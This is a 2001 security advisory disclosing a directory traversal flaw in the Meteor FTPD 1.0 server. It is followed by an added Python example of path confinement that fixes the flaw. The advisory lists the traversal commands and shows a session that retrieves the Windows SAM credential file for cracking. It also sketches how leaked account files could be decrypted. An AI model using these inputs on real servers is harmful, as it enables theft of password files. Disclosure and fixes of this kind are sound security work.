------------------------------------------------------------------------------------------------
Cartel Informatique - Security Advisory

Topic: Meteor FTPD 1.0 Directory Traversal
Advisory ID: CARTSA-2001-03
Public Disclosure: 2001-09-27
Author Contacted: 2001-09-15
Product: Meteor FTPD 1.0
Credits: Nicolas Brulez - Brulez@cartel-info.fr
------------------------------------------------------------------------------------------------

Vendor Affected:
================
Charles Clark - meteorsoft@hotmail.com
Freeware

"Meteor FTP is a personal FTP server designed for the Microsoft Windows 98 and Windows Millennium Edition operating systems."

Note from the author:
=====================
"Be aware that any FTP server can present security vulnerabilities on the computer on which it runs, potentially allowing access to system resources beyond those intended by the system operator. For this reason Meteor FTP is NOT recommended for use on systems hosting sensitive files such as financial records, etc."

True, and this server is vulnerable.

Problem:
========
The Cartel security team has found a directory traversal bug in the Meteor FTP server that allows remote users to browse any directory on the victim's hard drive and to list or retrieve files outside the FTP root directory.

This is possible by sending commands like:

ls ../*
ls /../*
ls .../*
cd ...

Example:
========
220 Service ready for new user
Utilisateur (192.168.160.3:(none)) : nbz
331 User name okay, need password
Mot de passe :
230- Meteor FTP Version 1.0
230 User logged in, proceed
ftp> ls ../winnt/repair/*
200 Command OK
150 About to open data connection
.
..
setup.log
secsetup.inf
system
software
default
security
sam
ntuser.dat
autoexec.nt
config.nt
226 Closing data connection. Requested file action successful.
ftp : 110 octets reçus dans 0,02Secondes 5,50Ko/sec.
ftp> get ../winnt/repair/sam sam2crack
200 Command OK
150 About to open data connection
226 Closing data connection. Requested file action successful.
ftp : 20480 octets reçus dans 0,01Secondes 2048,00Ko/sec.
ftp> ls ../*
..

We wouldn't have been able to do this if we weren't logged in as Administrator, though. That's why the FTPD needs to be started with user privileges.

ftp> cd ..
501 Directory .. does not exist
ftp> cd ...
250 ... is current working directory
ftp> ls

Extra notes:
============
The FTP server seems to behave differently on Win2K and Win9x: some commands work under one OS and not under the other, but the FTP server can be exploited on both anyway :)

The server asks us for a password used to encrypt the login/password file. This password can be found in the registry in plain text. Combined with this attack, it is easy to imagine a way to get it from the registry and decrypt all the accounts, once the account file has been leeched through the directory traversal bug.

A computer-dependent password, based on the hard disk serial number for example, would be more secure and at least better than a plain-text one. I suggest hashing the HD serial and using it as the password, without storing it in the registry of course, else it is pointless: some algorithm run at start, without any use of the registry.

Imagine an attacker getting the login file. He just has to install the server on his own computer, put in the encrypted login file, enter the password he leeched from the compromised computer, and he has all the users/passwords. With the hash trick, his own box won't decrypt it properly, because of a different hash value, based on the HD serial.

Status:
=======
Author made a fix.

Fix:
====
Get the new version as soon as it is public.

Greetings to my friends at:
===========================
USSR, Hert, Vauban systems and qualys.

About:
======
Cartel is a company based in France, dedicated to research on network security and application security systems.
Security services provided are:
- Firewall testing
- Network Penetration Testing
- Application Security Testing
- Data protection
- Intrusion Detection Systems
- Binary auditing
- Secure Web hosting
- Antivirus
- PKI
- VPN

Copyright (c) Cartel Informatique Security Research LABS.
This document is copyrighted. You can't modify it without explicit consent of CARTEL LABS. Feel free to publish it on any security site.

For more information, feel free to contact us.

Cartel info security research labs
mail: srl@cartel-info.fr or Brulez@cartel-info.fr
http://cartel-info.fr
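The traversal shown in the Problem and Example sections comes down to the server screening the literal ".." (hence "501 Directory .. does not exist") while handing every other name, including "...", straight to the operating system, which on Win9x walks up the tree. The following is an added example, not code from the advisory or from the Meteor FTP author, of the containment check such a server should apply instead: the client path is first resolved in a virtual tree rooted at the export directory, any dot-only component is refused outright, and the final filesystem path is compared against the root again after symlink resolution. FTP_ROOT, PathEscape, virtual_resolve, confine and is_allowed are names assumed for this example, and the root directory is constructed.

```python
"""Added example: confining client-supplied FTP paths to the server root.

Every path argument from LIST/RETR/CWD is resolved against the session's
virtual directory before the filesystem is touched, and any component that
would climb out of the root is refused. Names and the root are assumptions.
"""
import os

FTP_ROOT = "/srv/ftp"   # constructed root directory for this example


class PathEscape(ValueError):
    """Raised when a client path would leave the FTP root."""


def virtual_resolve(cwd, client_path):
    """Return the client's request as an absolute virtual path under the root.

    cwd         - the session's current virtual directory, e.g. "/pub"
    client_path - the argument exactly as received from the client
    """
    raw = client_path.replace("\\", "/")          # Windows servers accept both
    # Absolute paths restart at the virtual root; relative ones extend cwd.
    parts = [] if raw.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in raw.split("/"):
        if comp in ("", "."):
            continue                              # empty or "." changes nothing
        if comp == "..":
            if not parts:
                raise PathEscape("'..' would climb above the root")
            parts.pop()                           # step up, but only inside root
            continue
        if set(comp) == {"."}:
            # "...", "...." are ordinary names to a POSIX normaliser, but
            # Win9x/DOS treats them as parent-of-parent and beyond; the
            # advisory's "cd ..." works because only ".." was screened.
            raise PathEscape(f"refusing dot-only component {comp!r}")
        parts.append(comp)
    return "/" + "/".join(parts)


def confine(client_path, cwd="/", root=FTP_ROOT):
    """Map a client path to a real filesystem path, or raise PathEscape."""
    virtual = virtual_resolve(cwd, client_path)
    root_real = os.path.realpath(root)
    final = os.path.realpath(os.path.join(root_real, virtual.lstrip("/")))
    # Second line of defence: after symlink resolution the result must still
    # sit at or below the root directory.
    if final != root_real and not final.startswith(root_real + os.sep):
        raise PathEscape("resolved path lies outside the root")
    return final


def is_allowed(client_path, cwd="/", root=FTP_ROOT):
    """Boolean wrapper for a server's command dispatcher."""
    try:
        confine(client_path, cwd, root)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    # The four probes from the advisory, plus two legitimate requests.
    for req in ("../*", "/../*", ".../*", "...", "pub/../incoming", "pub/./docs"):
        print(f"{req!r:20} -> {'allowed' if is_allowed(req) else 'REFUSED'}")
```

The virtual resolution is what makes the check robust: a ".." that stays inside the root (pub/../incoming) is fine, while one that would pop an empty stack is refused before any filesystem call, and the realpath comparison catches anything a symlink under the root might otherwise open up.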